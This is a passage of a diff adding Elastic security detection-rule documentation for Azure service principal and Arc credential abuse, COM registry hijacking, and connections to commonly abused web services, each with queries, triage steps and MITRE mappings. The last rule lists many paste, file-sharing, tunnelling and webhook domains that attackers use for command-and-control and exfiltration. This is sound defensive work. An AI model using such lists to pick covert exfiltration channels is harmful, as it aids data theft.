+* Tactic: Initial Access
+* Tactic: Credential Access
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Azure Arc Cluster Credential Access by Identity from Unusual Source*
+
+
+The `listClusterUserCredential` operation on an Azure Arc-connected cluster returns credentials that allow the caller
+to establish a proxy tunnel via `az connectedk8s proxy`. This proxy routes kubectl commands through the Azure ARM API,
+enabling Kubernetes access without direct network connectivity to the cluster API server.
+
+
+*Possible investigation steps*
+
+
+- Identify the caller service principal using `azure.activitylogs.identity.claims.appid` and cross-reference with
+ Azure AD to determine if this is a known application.
+- Check the source IP and geolocation — is this from a country or ASN where your organization operates?
+- Correlate with Azure Sign-In Logs around the same time to see the full authentication chain (SP login followed by
+ credential listing).
+- Verify the Azure role used — the `Azure Arc Enabled Kubernetes Cluster User Role` is required for this operation.
+ Was this role recently assigned?
+- Check if subsequent Arc-proxied operations (secret/configmap CRUD) occurred after the credential access.
+- Review the service principal creation date in Azure AD — recently created SPs are more suspicious.
+
+
+*Response and remediation*
+
+
+- If the source IP is from an unexpected country or the service principal is not recognized, treat as potential
+ credential compromise.
+- Revoke the service principal credentials and remove Arc RBAC role assignments.
+- Review Kubernetes audit logs for any operations performed through the Arc proxy after credential access.
+- Rotate any Kubernetes secrets that may have been accessed.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset: "azure.activitylogs"
+ and azure.activitylogs.operation_name: "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION"
+ and event.outcome: (Success or success)
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
+* Sub-technique:
+** Name: Cloud Accounts
+** ID: T1078.004
+** Reference URL: https://attack.mitre.org/techniques/T1078/004/
+* Tactic:
+** Name: Credential Access
+** ID: TA0006
+** Reference URL: https://attack.mitre.org/tactics/TA0006/
+* Technique:
+** Name: Unsecured Credentials
+** ID: T1552
+** Reference URL: https://attack.mitre.org/techniques/T1552/
+* Sub-technique:
+** Name: Container API
+** ID: T1552.007
+** Reference URL: https://attack.mitre.org/techniques/T1552/007/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc
new file mode 100644
index 0000000000..5d808bf222
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc
@@ -0,0 +1,149 @@
+[[prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries]]
+=== Azure Service Principal Authentication from Multiple Countries
+
+Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts.
+
+*Rule type*: esql
+
+*Rule indices*: None
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 1h
+
+*Searches indices from*: now-8h ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins
+* https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identities
+* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/
+* https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis
+
+*Tags*:
+
+* Domain: Cloud
+* Domain: Identity
+* Data Source: Azure
+* Data Source: Microsoft Entra ID
+* Data Source: Microsoft Entra ID Sign-In Logs
+* Use Case: Identity and Access Audit
+* Use Case: Threat Detection
+* Tactic: Initial Access
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Azure Service Principal Authentication from Multiple Countries*
+
+
+Service principals are non-interactive identities used for automation and application access. Unlike user accounts,
+they rarely change geographic location. Authentication from multiple countries in a short window is a strong indicator
+of credential compromise.
+
+
+*Possible investigation steps*
+
+
+- Identify the service principal using the `app_id` and `app_display_name` from the alert.
+- Review the list of countries and source IPs — do they match known infrastructure locations?
+- Check when the service principal credentials were last rotated — stale credentials are more likely compromised.
+- Investigate what resources were accessed after authentication using Azure Activity Logs and Graph Activity Logs.
+- Correlate with Azure AD Audit Logs for recent changes to the service principal (new credentials, federated
+ identities, owner changes).
+- Check if the service principal has Azure Arc or Kubernetes-related role assignments, which could indicate
+ targeting of cluster resources.
+
+
+*False positive analysis*
+
+- If the service principal is used by a CI/CD pipeline, check if the different countries align with known runner locations. Baseline the expected geographic distribution for that SP.
+- If administrators manage the SP, correlate with known travel patterns or VPN usage that could explain multi-country access.
+
+
+*Response and remediation*
+
+
+- Immediately rotate the service principal credentials (secrets and certificates).
+- Revoke active sessions and tokens.
+- Review and remove any unauthorized role assignments.
+- Audit resources accessed from the suspicious locations.
+- Enable conditional access policies to restrict service principal authentication by location if supported.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+FROM logs-azure.signinlogs-* metadata _id, _index
+| WHERE event.dataset == "azure.signinlogs"
+ AND azure.signinlogs.category == "ServicePrincipalSignInLogs"
+ AND azure.signinlogs.properties.status.error_code == 0
+ AND source.geo.country_iso_code IS NOT NULL
+ AND azure.signinlogs.properties.service_principal_id IS NOT NULL
+ AND NOT azure.signinlogs.properties.app_owner_tenant_id IN (
+ "f8cdef31-a31e-4b4a-93e4-5f571e91255a",
+ "72f988bf-86f1-41af-91ab-2d7cd011db47"
+ )
+
+| EVAL
+ Esql.source_ip_string = TO_STRING(source.ip),
+ Esql.source_ip_country_pair = CONCAT(Esql.source_ip_string, " - ", source.geo.country_name)
+
+| STATS
+ Esql.source_geo_country_iso_code_count_distinct = COUNT_DISTINCT(source.geo.country_iso_code),
+ Esql.source_geo_country_name_values = VALUES(source.geo.country_name),
+ Esql.source_geo_city_name_values = VALUES(source.geo.city_name),
+ Esql.source_ip_values = VALUES(source.ip),
+ Esql.source_ip_country_pair_values = VALUES(Esql.source_ip_country_pair),
+ Esql.source_network_org_name_values = VALUES(`source.as.organization.name`),
+ Esql.resource_display_name_values = VALUES(azure.signinlogs.properties.resource_display_name),
+ Esql.app_id_values = VALUES(azure.signinlogs.properties.app_id),
+ Esql.app_owner_tenant_id_values = VALUES(azure.signinlogs.properties.app_owner_tenant_id),
+ Esql.source_ip_count_distinct = COUNT_DISTINCT(source.ip),
+ Esql.source_geo_city_name_count_distinct = COUNT_DISTINCT(source.geo.city_name),
+ Esql.source_network_org_name_count_distinct = COUNT_DISTINCT(`source.as.organization.name`),
+ Esql.timestamp_first_seen = MIN(@timestamp),
+ Esql.timestamp_last_seen = MAX(@timestamp),
+ Esql.event_count = COUNT(*)
+ BY azure.signinlogs.properties.service_principal_id, azure.signinlogs.properties.app_display_name
+
+| WHERE Esql.source_geo_country_iso_code_count_distinct >= 2
+| KEEP *
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
+* Sub-technique:
+** Name: Cloud Accounts
+** ID: T1078.004
+** Reference URL: https://attack.mitre.org/techniques/T1078/004/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc
new file mode 100644
index 0000000000..a9a1852658
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc
@@ -0,0 +1,136 @@
+[[prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access]]
+=== Azure Service Principal Sign-In Followed by Arc Cluster Credential Access
+
+Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-azure.signinlogs-*
+* logs-azure.activitylogs-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 15m
+
+*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect
+* https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy
+* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins
+* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence
+* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/
+
+*Tags*:
+
+* Domain: Cloud
+* Domain: Identity
+* Data Source: Azure
+* Data Source: Azure Arc
+* Data Source: Microsoft Entra ID
+* Data Source: Microsoft Entra ID Sign-In Logs
+* Use Case: Threat Detection
+* Tactic: Credential Access
+* Tactic: Initial Access
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Azure Service Principal Sign-In Followed by Arc Cluster Credential Access*
+
+
+This rule detects the complete attack entry point for Arc-proxied Kubernetes attacks: a service principal authenticates
+to Azure AD, then immediately retrieves Arc cluster credentials. This is the prerequisite sequence before any
+Kubernetes-level activity can occur through the Arc proxy.
+
+
+*Possible investigation steps*
+
+
+- Identify the service principal using the `app_id` from the sign-in event and resolve it in Azure AD — is this a
+ known application?
+- Check the sign-in source IP and geolocation — does it match expected infrastructure locations for this SP?
+- Review when the SP credentials were last rotated — stale credentials are more likely compromised.
+- Check the ASN of the sign-in source — is it from a known cloud provider, corporate network, or unexpected consumer ISP?
+- Examine Azure Activity Logs after the credential listing for any Arc-proxied operations (secret/configmap CRUD).
+- Correlate with Kubernetes audit logs for operations by the Arc proxy service account
+ (`system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa`) in the same time window.
+- Review Azure AD Audit Logs for recent changes to this SP (new credentials, federated identities, owner changes).
+
+
+*Response and remediation*
+
+
+- Immediately rotate the service principal credentials (secrets and certificates).
+- Revoke active sessions and tokens for the SP.
+- Review and remove any unauthorized Azure role assignments on Arc-connected clusters.
+- Check Kubernetes audit logs for any operations performed through the Arc proxy after credential access.
+- Rotate any Kubernetes secrets that may have been accessed through the proxy tunnel.
+- Enable conditional access policies to restrict service principal authentication by location if supported.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+sequence with maxspan=30m
+[authentication where event.dataset == "azure.signinlogs"
+ and azure.signinlogs.category == "ServicePrincipalSignInLogs"
+ and azure.signinlogs.properties.status.error_code == 0
+] by azure.signinlogs.properties.app_id
+[any where event.dataset == "azure.activitylogs"
+ and azure.activitylogs.operation_name : "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION"
+ and event.outcome : ("Success", "success")
+] by azure.activitylogs.identity.claims.appid
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Credential Access
+** ID: TA0006
+** Reference URL: https://attack.mitre.org/tactics/TA0006/
+* Technique:
+** Name: Unsecured Credentials
+** ID: T1552
+** Reference URL: https://attack.mitre.org/techniques/T1552/
+* Sub-technique:
+** Name: Container API
+** ID: T1552.007
+** Reference URL: https://attack.mitre.org/techniques/T1552/007/
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
+* Sub-technique:
+** Name: Cloud Accounts
+** ID: T1078.004
+** Reference URL: https://attack.mitre.org/techniques/T1078/004/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc
new file mode 100644
index 0000000000..718c9b7d7f
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc
@@ -0,0 +1,215 @@
+[[prebuilt-rule-8-19-18-component-object-model-hijacking]]
+=== Component Object Model Hijacking
+
+Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-endpoint.events.registry-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Persistence
+* Tactic: Defense Evasion
+* Tactic: Privilege Escalation
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+
+*Version*: 119
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Component Object Model Hijacking*
+
+
+Adversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.
+
+
+*Possible investigation steps*
+
+
+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Identify the user account that performed the action and whether it should perform this kind of action.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.
+- Retrieve the file referenced in the registry and determine if it is malicious:
+ - Use a private sandboxed malware analysis system to perform analysis.
+ - Observe and collect information about the following activities:
+ - Attempts to contact external domains and addresses.
+ - File and registry access, modification, and creation activities.
+ - Service creation and launch activities.
+ - Scheduled task creation.
+ - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.
+ - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.
+
+
+*False positive analysis*
+
+
+- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.
+
+
+*Response and remediation*
+
+
+- Initiate the incident response process based on the outcome of the triage.
+- Isolate the involved host to prevent further post-compromise behavior.
+- If the triage identified malware, search the environment for additional compromised hosts.
+ - Implement temporary network rules, procedures, and segmentation to contain the malware.
+ - Stop suspicious processes.
+ - Immediately block the identified indicators of compromise (IoCs).
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.
+- Remove and block malicious artifacts identified during triage.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+registry where host.os.type == "windows" and event.type == "change" and
+ /* not necessary but good for filtering privileged installations */
+ user.domain != "NT AUTHORITY" and process.executable != null and
+ (
+ (
+ registry.path : "HK*\\InprocServer32\\" and
+ registry.data.strings: ("scrobj.dll", "?:\\*\\scrobj.dll") and
+ not registry.path : "*\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\*"
+ ) or
+
+ (
+ registry.path : "HKLM\\*\\InProcServer32\\*" and
+ registry.data.strings : ("*\\Users\\*", "*\\ProgramData\\*")
+ ) or
+
+ /* in general COM Registry changes on Users Hive is less noisy and worth alerting */
+ (
+ registry.path : (
+ "HKEY_USERS\\*\\InprocServer32\\",
+ "HKEY_USERS\\*\\LocalServer32\\",
+ "HKEY_USERS\\*\\DelegateExecute",
+ "HKEY_USERS\\*\\TreatAs\\",
+ "HKEY_USERS\\*\\ScriptletURL*",
+ "HKEY_USERS\\*\\TypeLib*\\Win*"
+ ) and
+ not registry.data.strings : (
+ /* COM related to Windows Spotlight feature */
+ "{4813071a-41ad-44a2-9835-886d2f63ca30}",
+
+ /* AppX/MSIX DelegateExecute handlers: execute, protocol, file */
+ "{A56A841F-E974-45C1-8001-7E3F8A085917}",
+ "{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}",
+ "{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}"
+ )
+ )
+ ) and
+
+ not (
+ process.code_signature.trusted == true and
+ process.code_signature.subject_name in (
+ "Island Technology Inc.", "Google LLC", "Grammarly, Inc.", "Dropbox, Inc", "REFINITIV US LLC", "HP Inc.", "Adobe Inc.",
+ "Citrix Systems, Inc.", "Veeam Software Group GmbH", "Zhuhai Kingsoft Office Software Co., Ltd.", "Oracle America, Inc.",
+ "Brave Software, Inc.", "DeepL SE", "Opera Norway AS", "Thomas Braun", "Slack Technologies, LLC", "Spotify AB",
+ "Vivaldi Technologies AS"
+ )
+ ) and
+
+ /* excludes Microsoft signed noisy processes */
+ not
+ (
+ process.name : (
+ "OneDrive.exe", "OneDriveSetup.exe", "FileSyncConfig.exe", "Teams.exe", "MicrosoftEdgeUpdate.exe", "msrdcw.exe",
+ "MicrosoftEdgeUpdateComRegisterShell64.exe", "setup.exe", "PowerToys.PowerLauncher.exe"
+ ) and
+ process.code_signature.trusted == true and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation")
+ ) and
+
+ not process.executable : (
+ "?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe",
+ "?:\\Program Files (x86)\\*.exe",
+ "?:\\Program Files\\*.exe",
+ "?:\\ProgramData\\4Team\\4Team-Updater\\4Team-Updater-Helper.exe",
+ "?:\\ProgramData\\Lenovo\\Udc\\Hosts\\x64\\MessagingPlugin.exe",
+ "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe",
+ "?:\\Users\\*\\AppData\\Local\\Wondershare\\Wondershare NativePush\\WsToastNotification.exe",
+ "?:\\Windows\\System32\\DriverStore\\FileRepository\\*.exe",
+ "?:\\Windows\\System32\\FMToastNotification.exe",
+ "?:\\Windows\\System32\\msiexec.exe",
+ "?:\\Windows\\System32\\svchost.exe",
+ "?:\\Windows\\SysWOW64\\regsvr32.exe",
+ "?:\\Windows\\System32\\regsvr32.exe",
+ "\\Device\\Mup\\*\\Kufer\\KuferSQL\\BasysSQL.exe"
+ )
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Persistence
+** ID: TA0003
+** Reference URL: https://attack.mitre.org/tactics/TA0003/
+* Technique:
+** Name: Event Triggered Execution
+** ID: T1546
+** Reference URL: https://attack.mitre.org/techniques/T1546/
+* Sub-technique:
+** Name: Component Object Model Hijacking
+** ID: T1546.015
+** Reference URL: https://attack.mitre.org/techniques/T1546/015/
+* Tactic:
+** Name: Privilege Escalation
+** ID: TA0004
+** Reference URL: https://attack.mitre.org/tactics/TA0004/
+* Technique:
+** Name: Event Triggered Execution
+** ID: T1546
+** Reference URL: https://attack.mitre.org/techniques/T1546/
+* Sub-technique:
+** Name: Component Object Model Hijacking
+** ID: T1546.015
+** Reference URL: https://attack.mitre.org/techniques/T1546/015/
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Modify Registry
+** ID: T1112
+** Reference URL: https://attack.mitre.org/techniques/T1112/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc
new file mode 100644
index 0000000000..bf8ae4f253
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc
@@ -0,0 +1,350 @@ +[[prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services]] +=== Connection to Commonly Abused Web Services + +Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/operation-bleeding-bear +* https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry +* https://specterops.io/blog/2026/01/30/weaponizing-whitelists-an-azure-blob-storage-mythic-c2-profile/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: SentinelOne + +*Version*: 127 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Connection to Commonly Abused Web Services* + + +Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. 
+ +This rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html[Investigate Markdown Plugin] introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. + - !{investigate{"label":"Alerts associated with the user in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"user.id","queryType":"phrase","value":"{{user.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} + - !{investigate{"label":"Alerts associated with the host in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"host.name","queryType":"phrase","value":"{{host.name}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} +- Verify whether the digital signature exists in the executable. +- Identify the operation type (upload, download, tunneling, etc.). 
+- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - !{investigate{"label":"Investigate the Subject Process Network Events","providers":[[{"excluded":false,"field":"event.category","queryType":"phrase","value":"network","valueType":"string"},{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"}]]}} + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +network where host.os.type == "windows" and + dns.question.name != null and process.name != null and + not (?user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") or user.domain == "NT AUTHORITY") and + /* Add new WebSvc domains here */ + dns.question.name : + ( + "raw.githubusercontent.*", + "pastebin.*", + "paste4btc.com", + "paste.ee", + "ghostbin.com", + "drive.google.com", + "?.docs.live.net", + "api.dropboxapi.*", + "content.dropboxapi.*", + "dl.dropboxusercontent.*", + "api.onedrive.com", + "*.onedrive.org", + "onedrive.live.com", + "filebin.net", + "*.ngrok.io", + "ngrok.com", + "*.portmap.*", + "*serveo.net", + "*localtunnel.me", + "*pagekite.me", + "*localxpose.io", + "*notabug.org", + "rawcdn.githack.*", + "paste.nrecom.net", + "zerobin.net", + "controlc.com", + "requestbin.net", + "slack.com", + "api.slack.com", + "slack-redir.net", + "slack-files.com", + "cdn.discordapp.com", + "discordapp.com", + "discord.com", + "apis.azureedge.net", + "cdn.sql.gg", + "?.top4top.io", + "top4top.io", + "www.uplooder.net", + "*.cdnmegafiles.com", + "transfer.sh", + "gofile.io", + "updates.peer2profit.com", + "api.telegram.org", + "t.me", + "meacz.gq", + "rwrd.org", + "*.publicvm.com", + "*.blogspot.com", + "api.mylnikov.org", + "file.io", + "stackoverflow.com", + 
"*files.1drv.com", + "api.anonfile.com", + "*hosting-profi.de", + "ipbase.com", + "ipfs.io", + "*up.freeo*.space", + "api.mylnikov.org", + "script.google.com", + "script.googleusercontent.com", + "api.notion.com", + "graph.microsoft.com", + "*.sharepoint.com", + "mbasic.facebook.com", + "login.live.com", + "api.gofile.io", + "api.anonfiles.com", + "api.notion.com", + "api.trello.com", + "gist.githubusercontent.com", + "files.pythonhosted.org", + "g.live.com", + "*.zulipchat.com", + "webhook.site", + "run.mocky.io", + "mockbin.org", + "*googleapis.com", + "global.rel.tunnels.api.visualstudio.com", + "*.devtunnels.ms", + "api.github.com", + "*.blob.core.windows.net", + "*.blob.storage.azure.net", + "files.catbox.moe", + "*.supabase.co", + "*.elastic-cloud.com", + "*.cloud.es.io") and + + /* Insert noisy false positives here */ + not ( + ( + process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\*\\MsMpEng.exe", + "?:\\Users\\*\\AppData\\Local\\BraveSoftware\\*\\Application\\brave.exe", + "?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe", + 